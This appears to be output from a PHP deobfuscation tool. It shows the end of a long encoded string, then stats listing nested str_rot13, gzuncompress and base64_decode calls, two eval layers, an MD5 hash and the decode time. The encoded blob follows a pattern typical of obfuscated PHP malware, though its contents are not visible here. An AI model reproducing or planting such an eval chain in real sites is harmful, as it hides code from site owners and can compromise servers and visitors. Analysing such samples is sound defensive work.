sUW9hf9iDFsMbVEsjS73TgNCY7R+Ky8WXBSbnlM0vY/JDCZANPNCrmsvRcLzcGddsDLkhbZHSbc398x//oNQQVbNv28YSiD9W00ggpOs8nIzQqVduRAu2xuAKgGlHLTzEUx+u8Ic/Z+DxtUS1RGIjGNcFGxmHhjW5Mn43+oEzNjqYerpWYGIsIKgma7VM0LGnUjRzMzyh6OXAtQeAGkxUho6RANFT4xY6jgjetO92ITPZnJkU+2dZfrKNBMgUftIVyfKT/Yfyk31zmhbyky34STGY5RM1K0ZSTKYXVKaRNJd/QlnG5cYsUX2lqPrPBVEK8DPzyExn+JnOBLLxPCx56ZOWxn/+43/TEWRmCWOnCcSJWEaNiJMAxfMYeC8OLjKHHmpRE49swhfWSLo1ztG9k8V3Gl66rtmW57XxWK+NNfOKMyr9/+BvgS4='
)
)
);
Function Calls
str_rot13 | 1 |
gzuncompress | 2 |
base64_decode | 2 |
Stats
MD5 | 11408c67b08ccb7974be00dcfaba94d7 |
Eval Count | 2 |
Decode Time | 185 ms |